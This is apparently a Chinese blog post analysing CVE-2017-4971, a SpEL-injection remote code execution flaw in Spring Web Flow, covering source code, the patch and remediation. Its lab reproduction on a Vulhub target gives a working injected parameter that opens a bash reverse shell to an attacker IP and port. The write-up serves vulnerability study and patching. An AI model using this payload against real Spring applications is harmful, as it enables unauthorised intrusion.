CVE-2017-4971源码分析与漏洞复现

漏洞概述

CVE-2017-4971 是 Spring Web Flow 框架中的一个高危远程代码执行(RCE)漏洞,影响版本为 Spring Web Flow 2.4.0–2.4.4。攻击者通过构造包含恶意 SpEL(Spring Expression Language)表达式的 HTTP 请求参数,利用数据绑定过程中的表达式注入漏洞,触发任意命令执行。


技术细节分析

1. 漏洞成因
  • SpEL 表达式注入
    Spring Web Flow 在处理视图状态(view-state)的数据绑定时,未对用户输入的字段名(field)进行安全过滤。攻击者可通过构造恶意字段名(如 _(恶意表达式)),将 SpEL 表达式注入到数据绑定流程中,触发远程代码执行。
  • 默认配置缺陷
    若应用未显式配置 binder 节点(即 binderConfiguration 为空),框架会默认绑定所有请求参数,导致攻击者可控制 field 参数。
2. 源码分析
关键代码 1:demo中booking-flow.xml配置问题
<view-state id="reviewBooking" model="booking">
    <transition on="confirm" to="bookingConfirmed">
        <evaluate expression="bookingService.persistBooking(booking)" />
    </transition>
</view-state>
  • binder 节点为空触发漏洞
关键代码 2:数据绑定触发流程
    // AbstractMvcView.java
	protected void addDefaultMappings(DefaultMapper mapper, Set<String> parameterNames, Object model) {
		for (String parameterName : parameterNames) {
			if (fieldMarkerPrefix != null && parameterName.startsWith(fieldMarkerPrefix)) {
				String field = parameterName.substring(fieldMarkerPrefix.length());//去除请求参数的'_'
				if (!parameterNames.contains(field)) {
					addEmptyValueMapping(mapper, field, model);//触发漏洞
				}
			} else {
				addDefaultMapping(mapper, parameterName, model);//遍历请求参数并绑定
			}
		}
	}

漏洞触发路径

  1. binderConfiguration 为空时,框架调用 addDefaultMappings 处理所有请求参数。
  2. 攻击者提交形如 _(T(java.lang.Runtime).exec("calc")) 的参数,触发 addEmptyValueMapping 方法中的表达式解析。
关键代码 3:AbstractMvcView.javaaddEmptyValueMapping 方法
protected void addEmptyValueMapping(DefaultMapper mapper, String field, Object model) {
		ParserContext parserContext = new FluentParserContext().evaluate(model.getClass());
		Expression target = expressionParser.parseExpression(field, parserContext); //使用表达式解析器解析用户输入的字段名(field)
		try {
			Class<?> propertyType = target.getValueType(model);
			Expression source = new StaticExpression(getEmptyValue(propertyType));
			DefaultMapping mapping = new DefaultMapping(source, target);
			if (logger.isDebugEnabled()) {
				logger.debug("Adding empty value mapping for parameter '" + field + "'");
			}
			mapper.addMapping(mapping);
		} catch (EvaluationException e) {
		}
	}

问题点

  • field 参数直接来自用户请求,未进行过滤,导致 SpEL 表达式注入。
  • expressionParser 默认使用 SpelExpressionParser,允许执行任意表达式(如 T(java.lang.Runtime).exec())。
3. 补丁分析

官方修复方案通过以下方式限制漏洞利用:

1. 替换表达式解析器:

SpelExpressionParser 替换为 BeanWrapperExpressionParser,后者仅支持基础属性绑定,禁止执行复杂表达式。

2. 路径校验强化:

addEmptyValueMapping 方法中增加字段名合法性检查,阻止非法字符(如 T().)注入。


漏洞复现

环境搭建
1.使用 Vulhub 环境启动漏洞靶机:
  docker-compose up -d

在这里插入图片描述

2.访问访问 http://target:8080,确认服务正常运行

在这里插入图片描述

攻击步骤
1.登录网站(用户名和密码在网站给出,随便填一个)

在这里插入图片描述

2.随便订购一个,并在最后要点击confirm的时候用bp抓包

在这里插入图片描述

3.构造payload
&_T(java.lang.Runtime).getRuntime().exec("/bin/bash+-c+$%40|bash+0+echo+bash+-i+>%26/dev/tcp/192.168.1.102/6666+0>%261")
记得换为自己攻击机的ip和端口
4.kali开启监听

在这里插入图片描述

5.发送恶意请求包
  • payload添加到之前抓取的POST请求包里
    在这里插入图片描述
6.验证成功

在这里插入图片描述


修复方案

  1. 升级版本
    升级至 Spring Web Flow 2.4.5+,修复了表达式解析逻辑。
  2. 输入过滤
    在数据绑定配置中显式声明允许的字段名,拒绝未经验证的参数:
    <binder>
        <binding property="allowedField"/>
    </binder>
    
  3. 禁用默认绑定
    避免在 view-state 中省略 binder 配置,防止框架自动绑定所有请求参数。

总结

CVE-2017-4971 的根源在于 Spring Web Flow 对用户输入的过度信任与 SpEL 表达式解析的开放性设计。其修复方案通过限制表达式执行权限和强化输入校验,有效降低了攻击面。


参考链接

  1. CVE-2017-4971 漏洞原理分析(IBM DeveloperWorks)
  2. Spring Web Flow 源码获取与构建指南(掘金)
  3. CVE-2017-4971 官方公告(Pivotal)
  4. 漏洞复现笔记(CVE-2017-4971)
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值